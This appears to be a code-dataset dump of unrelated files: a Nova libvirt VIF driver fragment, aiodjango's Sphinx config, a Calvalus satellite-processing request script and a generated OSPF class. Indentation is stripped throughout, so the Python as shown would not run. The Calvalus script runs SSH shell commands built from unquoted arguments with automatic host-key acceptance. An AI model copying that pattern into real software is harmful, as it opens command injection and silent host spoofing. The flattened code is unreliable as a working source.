linux_net_utils.create_tap_dev(dev, mac)
network = vif.get('network')
mtu = network.get_meta('mtu') if network else None
linux_net_utils.set_device_mtu(dev, mtu)
def plug_vhostuser(self, instance, vif):
pass
def plug_vrouter(self, instance, vif):
"""Plug into Contrail's network port
Bind the vif to a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
ip_addr = '0.0.0.0'
ip6_addr = None
subnets = vif['network']['subnets']
for subnet in subnets:
if not subnet['ips']:
continue
ips = subnet['ips'][0]
if not ips['address']:
continue
if (ips['version'] == 4):
if ips['address'] is not None:
ip_addr = ips['address']
if (ips['version'] == 6):
if ips['address'] is not None:
ip6_addr = ips['address']
ptype = 'NovaVMPort'
if (CONF.libvirt.virt_type == 'lxc'):
ptype = 'NameSpacePort'
try:
multiqueue = self._is_multiqueue_enabled(instance.image_meta,
instance.flavor)
linux_net_utils.create_tap_dev(dev, multiqueue=multiqueue)
nova.privsep.libvirt.plug_contrail_vif(
instance.project_id,
instance.uuid,
instance.display_name,
vif['id'],
vif['network']['id'],
ptype,
dev,
vif['address'],
ip_addr,
ip6_addr,
)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while plugging vif"), instance=instance)
def _plug_os_vif(self, instance, vif):
instance_info = os_vif_util.nova_to_osvif_instance(instance)
try:
os_vif.plug(vif, instance_info)
except osv_exception.ExceptionBase as ex:
msg = (_("Failure running os_vif plugin plug method: %(ex)s")
% {'ex': ex})
raise exception.InternalError(msg)
def plug(self, instance, vif):
vif_type = vif['type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif})
if vif_type is None:
raise exception.VirtualInterfacePlugException(
_("vif_type parameter must be present "
"for this vif_driver implementation"))
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
self._plug_os_vif(instance, vif_obj)
return
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'plug_%s' % vif_slug, None)
if not func:
raise exception.VirtualInterfacePlugException(
_("Plug vif failed because of unexpected "
"vif_type=%s") % vif_type)
func(instance, vif)
def unplug_ib_hostdev(self, instance, vif):
fabric = vif.get_physical_network()
if not fabric:
raise exception.NetworkMissingPhysicalNetwork(
network_uuid=vif['network']['id']
)
vnic_mac = vif['address']
try:
nova.privsep.libvirt.unplug_infiniband_vif(fabric, vnic_mac)
except Exception:
LOG.exception(_("Failed while unplugging ib hostdev vif"))
def unplug_802qbg(self, instance, vif):
pass
def unplug_802qbh(self, instance, vif):
pass
def unplug_hw_veb(self, instance, vif):
# TODO(vladikr): This code can be removed once the minimum version of
# Libvirt is incleased above 1.3.5, as vlan will be set by libvirt
if vif['vnic_type'] == network_model.VNIC_TYPE_MACVTAP:
# The ip utility doesn't accept the MAC 00:00:00:00:00:00.
# Therefore, keep the MAC unchanged. Later operations on
# the same VF will not be affected by the existing MAC.
linux_net_utils.set_vf_interface_vlan(vif['profile']['pci_slot'],
mac_addr=vif['address'])
def unplug_hostdev_physical(self, instance, vif):
pass
def unplug_macvtap(self, instance, vif):
pass
def unplug_midonet(self, instance, vif):
"""Unplug from MidoNet network port
Unbind the vif from a MidoNet virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
nova.privsep.libvirt.unplug_midonet_vif(port_id)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_tap(self, instance, vif):
"""Unplug a VIF_TYPE_TAP virtual interface."""
dev = self.get_vif_devname(vif)
try:
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_iovisor(self, instance, vif):
"""Unplug using PLUMgrid IO Visor Driver
Delete network device and to their respective
connection to the Virtual Domain in PLUMgrid Platform.
"""
dev = self.get_vif_devname(vif)
try:
nova.privsep.libvirt.unplug_plumgrid_vif(dev)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def unplug_vhostuser(self, instance, vif):
pass
def unplug_vrouter(self, instance, vif):
"""Unplug Contrail's network port
Unbind the vif from a Contrail virtual port.
"""
dev = self.get_vif_devname(vif)
port_id = vif['id']
try:
nova.privsep.libvirt.unplug_contrail_vif(port_id)
linux_net_utils.delete_net_dev(dev)
except processutils.ProcessExecutionError:
LOG.exception(_("Failed while unplugging vif"), instance=instance)
def _unplug_os_vif(self, instance, vif):
instance_info = os_vif_util.nova_to_osvif_instance(instance)
try:
os_vif.unplug(vif, instance_info)
except osv_exception.ExceptionBase as ex:
msg = (_("Failure running os_vif plugin unplug method: %(ex)s")
% {'ex': ex})
raise exception.InternalError(msg)
def unplug(self, instance, vif):
vif_type = vif['type']
# instance.display_name could be unicode
instance_repr = utils.get_obj_repr_unicode(instance)
LOG.debug('vif_type=%(vif_type)s instance=%(instance)s '
'vif=%(vif)s',
{'vif_type': vif_type, 'instance': instance_repr,
'vif': vif})
if vif_type is None:
msg = _("vif_type parameter must be present for this vif_driver "
"implementation")
raise exception.InternalError(msg)
# Try os-vif codepath first
vif_obj = os_vif_util.nova_to_osvif_vif(vif)
if vif_obj is not None:
self._unplug_os_vif(instance, vif_obj)
return
# Legacy non-os-vif codepath
vif_slug = self._normalize_vif_type(vif_type)
func = getattr(self, 'unplug_%s' % vif_slug, None)
if not func:
msg = _("Unexpected vif_type=%s") % vif_type
raise exception.InternalError(msg)
func(instance, vif)
| apache-2.0 | 647,109,165,761,221,000 | 39.181511 | 79 | 0.577649 | false |
mlavin/aiodjango | docs/conf.py | 1 | 9308 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# aiodjango documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 22 08:33:47 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import datetime
import sys
import os
import shlex
import aiodjango
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'aiodjango'
copyright = '%s, Mark Lavin' % datetime.date.today().year
author = 'Mark Lavin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.'.join(aiodjango.__version__.split('.')[0:2])
# The full version, including alpha/beta/rc tags.
release = aiodjango.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'aiodjangodoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'aiodjango.tex', 'aiodjango Documentation',
'Mark Lavin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'aiodjango', 'aiodjango Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'aiodjango', 'aiodjango Documentation',
author, 'aiodjango', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| bsd-2-clause | 206,612,260,978,442,800 | 31.319444 | 79 | 0.707563 | false |
bcdev/snap-cawa | src/main/calvalus/cawa-inst/bin/lc2-step.py | 1 | 16258 | #!/usr/bin/python
import os
import sys
from pstep import PStep
import paramiko
cmd = sys.argv[1]
ps = PStep('CALVALUS')
# lc2-step ql noaa11 AVHRR_AC 1993 /calvalus/eodata/AVHRR_L1B/noaa11/1993 /calvalus/projects/lc/ql-noaa11-AVHRR_L1B/1993
if cmd == 'ql-orbit':
variables = {
'mission' : sys.argv[2],
'sensor' : sys.argv[3],
'year' : sys.argv[4],
'input' : sys.argv[5],
'output' : sys.argv[6],
'bands' : 'counts_1,counts_2,counts_4'
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4])
ps.submit_request(request)
# lc2-step era-interim proba 2009-01-01 2009-01-31 /calvalus/eodata/PROBAV_S1_TOA/v2/2009/01 /calvalus/projects/lc/era-interim-proba/2009/01
elif cmd == 'era-interim':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step sdr fr 2009-01-01 2009-01-31 default /calvalus/inventory/MER_FSG_1P/v2013/2009 /calvalus/eodata/MER_FSG_1P/v2013/2009/01 /calvalus/projects/lc/sdr-fr/2009/01 [/calvalus/projects/lc/sdr-fr/2009]
elif cmd == 'sdr':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
template = { 'fr': 'sdr',
'rr': 'sdr',
'spot': 'sdr-spot',
'proba': 'sdr-proba',
'avhrr11': 'sdr-avhrr',
'avhrr14': 'sdr-avhrr',
'avhrr': 'sdr-avhrr',
'avhrr2': 'sdr-avhrr' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'useUclCloudForShadow' : sys.argv[5]=='default',
'inventory' : sys.argv[6],
'input' : sys.argv[7][:-8],
'output' : sys.argv[8],
'year' : year,
'month' : month
}
request = ps.apply_template(template, variables, sys.argv[2] + '-' + sys.argv[5] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step.py ncformat fr 2009-01-01 default /calvalus/projects/lc/sdr-fr/2009/01 /calvalus/projects/lc/sdr-fr-nc/2009/01
elif cmd == 'ncformat':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
pattern = { 'fr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'rr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'avhrr11': 'L2_of_ao11${MM}${dd}.*.seq',
'avhrr14': 'L2_of_ao14${MM}${dd}.*.seq',
'spot': 'L2_of_V.KRNP____${yyyy}${MM}${dd}F.*.seq',
'proba': 'L2_of_PROBAV_S1_TOA_......_${yyyy}${MM}${dd}.*.seq' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'input' : sys.argv[5],
'output' : sys.argv[6],
'year' : year,
'month' : month,
'pattern' : pattern
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[4] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step.py sr fr 2010-01-01 2010-01-07 default /calvalus/projects/lc/sdr-fr/2010 /calvalus/projects/lc/sr-fr-default/2010
elif cmd == 'sr':
year = sys.argv[3][:4]
pattern = { 'fr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'rr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'avhrr11': 'ao11${MM}${dd}.*.nc',
'avhrr14': 'ao14${MM}${dd}.*.nc',
'avhrr': 'L2_of_ao..${MM}${dd}.*.nc',
'spot': 'L2_of_V.KRNP____${yyyy}${MM}${dd}F.*.seq',
'proba': 'L2_of_PROBAV_S1_TOA_......_${yyyy}${MM}${dd}.*.seq' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'RESOLUTION' : { 'fr': 'FR',
'rr': 'RR',
'spot': 'SPOT',
'proba': 'PROBA',
'avhrr11': 'HRPT',
'avhrr14': 'HRPT',
'avhrr': 'HRPT' }[sys.argv[2]],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'filter' : sys.argv[5],
'input' : sys.argv[6][:sys.argv[6].rfind('/')],
'output' : sys.argv[7]+'/l3-',
'year' : year,
'pattern' : pattern
}
request = ps.apply_template('sr', variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[5])
ps.submit_request(request)
# lc2-step.py nccopy fr 2003-01-01 2003-01-31 default /calvalus/projects/lc/sr-fr-default/2003 /calvalus/projects/lc/sr-fr-nc-classic/2003
elif cmd == 'nccopy':
year = sys.argv[3][:4]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6][:sys.argv[6].rfind('/')],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[5])
ps.submit_request(request)
# lc2-step.py qll3 spot 2012-02-12 2012-02-18 7 default /calvalus/projects/lc/sr-spot-default/2012 /calvalus/projects/lc/ql-sr-spot-default/2012
elif cmd == 'qll3':
year = sys.argv[3][:4]
redband = { 'fr': 'sr_3_mean',
'rr': 'sr_3_mean',
'spot': 'sr_B0_mean',
'proba': 'sr_1_mean',
'avhrr11': 'sr_1_mean',
'avhrr14': 'sr_1_mean',
'avhrr': 'sr_1_mean' }
greenband = { 'fr': 'sr_5_mean',
'rr': 'sr_5_mean',
'spot': 'sr_B2_mean',
'proba': 'sr_2_mean',
'avhrr11': 'sr_2_mean',
'avhrr14': 'sr_2_mean',
'avhrr': 'sr_2_mean' }
blueband = { 'fr': 'sr_7_mean',
'rr': 'sr_7_mean',
'spot': 'sr_B3_mean',
'proba': 'sr_3_mean',
'avhrr11': 'bt_4_mean',
'avhrr14': 'bt_4_mean',
'avhrr': 'bt_4_mean' }
variables = {
'resolution' : sys.argv[2],
'RESOLUTION' : { 'fr': 'FR',
'rr': 'RR',
'spot': 'SPOT',
'proba': 'PROBA',
'avhrr11': 'HRPT',
'avhrr14': 'HRPT',
'avhrr': 'HRPT' }[sys.argv[2]],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'periodLength' : sys.argv[5],
'input' : sys.argv[7],
'output' : sys.argv[8],
'year' : year,
'maskexpr' : 'current_pixel_state == 1 or current_pixel_state == 3',
'redband' : redband[sys.argv[2]],
'greenband' : greenband[sys.argv[2]],
'blueband' : blueband[sys.argv[2]]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[6])
ps.submit_request(request)
# lc2-step.py ql-avhrr-coverage noaa11 1993-01-01 1993-01-31 /calvalus/eodata/AVHRR_L1B/noaa11/1993/01 /calvalus/projects/lc/ql-avhrr-coverage/1993/01
elif cmd == 'ql-avhrr-coverage':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'platform' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, year + '-' + month)
ps.submit_request(request)
# lc2-step avhrr-idepix noaa14 1997-05-01 1997-05-31 /calvalus/eodata/AVHRR_L1B/noaa14/1997/05 /calvalus/projects/lc/avhrr-idepix/1997/05
elif cmd == 'avhrr-idepix':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'platform' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, year + '-' + month)
ps.submit_request(request)
# lc2-step.py seasonal-compositing fr 2009-12-03-P17W 2009-12-03 2010-04-01 120 /calvalus/eodata/MERIS_SR_FR/v1.0/2009 /calvalus/projects/lc/seasonal-fr/2009/2009-12-03-P17W
elif cmd == 'seasonal-compositing':
if sys.argv[2] == 'fr' or sys.argv[2] == 'proba':
rows = '64800'
else:
rows = '16200'
variables = {
'resolution' : sys.argv[2],
'rows' : rows,
'season' : sys.argv[3],
'start' : sys.argv[4],
'stop' : sys.argv[5],
'period' : sys.argv[6],
'input' : sys.argv[7][:-5],
'output' : sys.argv[-1]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py seasonal-formatting fr 2009-12-03-P17W 2009-12-03 2010-04-01 /calvalus/projects/lc/seasonal-fr/2009/2009-12-03-P17W /calvalus/projects/lc/seasonal-fr-geotiff/2009/2009-12-03-P17W
elif cmd == 'seasonal-formatting':
variables = {
'resolution' : sys.argv[2],
'season' : sys.argv[3],
'start' : sys.argv[4],
'stop' : sys.argv[5],
'input' : sys.argv[6],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py qa-table fr 2009 /calvalus/eodata/MER_FRS_1P/v2013/2009 /calvalus/projects/lc/qa-fr/2009
elif cmd == 'qa-table':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py mask noaa11 1992 /calvalus/eodata/AVHRR_L1B/noaa11/1992 /calvalus/projects/lc/mask-noaa11/1992
elif cmd == 'qa-mask':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3])
ps.submit_request(request)
# lc2-step qa-ql noaa11 1993 /calvalus/projects/lc/mask-noaa11/1992 /calvalus/projects/lc/qlm-noaa11/1992
elif cmd == 'qa-ql':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3])
ps.submit_request(request)
# lc2-step.py destitching noaa11 1993 05 31 /calvalus/eodata/AVHRR_L1B/noaa11/1993/05 /calvalus/projects/lc/destitching/noaa11-list/1993/05
elif cmd == 'destitching':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'lastdayofmonth' : sys.argv[5],
'input' : sys.argv[6][:-8],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py addheader noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-list/1993/05 /calvalus/projects/lc/destitching/noaa11-table/1993/05
elif cmd == 'addheader':
resolution = sys.argv[2]
year = sys.argv[3]
month = sys.argv[4]
csvlist = sys.argv[5] + '/part-r-00000'
tableDir = sys.argv[6][:-8]
table = tableDir + '/avhrr-' + resolution + '-' + year + '-' + month + '.csv'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('feeder01.bc.local', username=os.getlogin())
ssh.exec_command('bash -c \'mkdir -p ' + tableDir + '; rm -f ' + table + '; echo "product output startLine numLines subsetX subsetY subsetWidth subsetHeight" | cat - ' + csvlist + ' > ' + table + '\'')
# lc2-step.py addl2of noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-table/1993/05 /calvalus/projects/lc/destitching/noaa11-table2/1993/05
elif cmd == 'addl2of':
resolution = sys.argv[2]
year = sys.argv[3]
month = sys.argv[4]
tableDir = sys.argv[5][:-8]
table = tableDir + '/avhrr-' + resolution + '-' + year + '-' + month + '.csv'
table2Dir = sys.argv[6][:-8]
table2 = table2Dir + '/avhrr-l2-' + resolution + '-' + year + '-' + month + '.csv'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('feeder01.bc.local', username=os.getlogin())
ssh.exec_command('bash -c \'mkdir -p ' + table2Dir + '; rm -f ' + table2 + '; cat ' + table + ' | sed -e "s,ao,L2_of_L2_of_ao,g" -e "s,/calvalus/eodata/AVHRR_L1B/noaa\\(..\\)/\\(....\\)/\\(..\\)/..,/calvalus/projects/lc/ac-avhrr\\1-default-nc/\\2/\\3," -e "s,.l1b,.nc,g" > ' + table2 + '\'')
# lc2-step.py subsetting noaa11 1993 05 /calvalus/eodata/AVHRR_L1B/noaa11/1993/05 /calvalus/projects/lc/destitching/noaa11-table/1993/05 /calvalus/projects/lc/destitching/noaa11-albedo2/1993/05
elif cmd == 'subsetting':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'table' : sys.argv[6][:-7] + 'avhrr-' + sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4] + '.csv',
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py subsetting2 noaa14 1996 06 /calvalus/projects/lc/ac-avhrr14-default-nc/1996/06 /calvalus/projects/lc/destitching/noaa14-table2/1996/06 /calvalus/projects/lc/ac-subsets-noaa14/1996/06
elif cmd == 'subsetting2':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'table' : sys.argv[6][:-7] + 'avhrr-l2-' + sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4] + '.csv',
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py correlating noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-albedo2/1993/05 /calvalus/projects/lc/destitching/noaa11-tiepoints/1993/05
elif cmd == 'correlating':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'input' : sys.argv[5],
'output' : sys.argv[6]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py warping noaa14 1996 06 /calvalus/projects/lc/ac-subsets-noaa14/1996/06 /calvalus/projects/lc/destitching/noaa14-tiepoints/1996/06 /calvalus/projects/lc/ac-warped-noaa14/1996/06
elif cmd == 'warping':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'input' : sys.argv[5],
'tiepoints' : sys.argv[6],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step lcac noaa14 1996-06-01 1996-06-30 default /calvalus/projects/lc/sdr-noaa14-default-nc/1996/06 /calvalus/projects/lc/ac-noaa14-default-nc/1996/06
elif cmd == 'lcac':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6],
'output' : sys.argv[7],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step qamerge noaa14 1996-06-01 1996-06-30 /calvalus/projects/lc/ac-noaa14-default-nc/1996/06 /calvalus/projects/lc/ac-noaa14-default-qa/1996/06
elif cmd == 'qamerge':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6],
'output' : sys.argv[7],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
else:
print 'unknown command', cmd
sys.exit(1)
| gpl-3.0 | -4,678,787,371,043,600,000 | 35.617117 | 295 | 0.548161 | false |
napalm-automation/napalm-yang | napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/__init__.py | 1 | 12436 | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class prefix_sid(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/opaque-lsa/extended-prefix/tlvs/tlv/prefix-sid. Each member element of
the container is represented as a class variable - with a specific
YANG type.
